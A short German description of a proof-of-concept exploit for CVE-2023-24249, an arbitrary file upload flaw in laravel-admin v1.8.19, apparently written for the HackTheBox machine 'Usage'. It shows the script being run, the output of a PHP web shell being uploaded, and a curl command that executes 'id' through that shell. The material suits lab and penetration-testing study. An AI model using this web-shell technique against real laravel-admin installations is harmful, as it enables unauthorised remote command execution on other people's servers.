
Proof-of-Concept-Exploit für CVE-2023-24249, eine Schwachstelle für beliebige Datei-Uploads in laravel-admin, die die Bereitstellung von Web-Shells für Penetrationstests und CTF-Challenges ermöglicht.
CVE-2023-24249 ist eine Schwachstelle für beliebige Dateiuploads in laravel-admin v1.8.19. Dieses Proof-of-Concept nutzt die Schwachstelle aus, um eine Web-Shell hochzuladen.
Der Exploit wurde geschrieben, um gegen die Easy-Maschine Usage von HackTheBox eingesetzt zu werden.
python3 CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php
curl http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php?c=id
uid=1000(dash) gid=1000(dash) groups=1000(dash)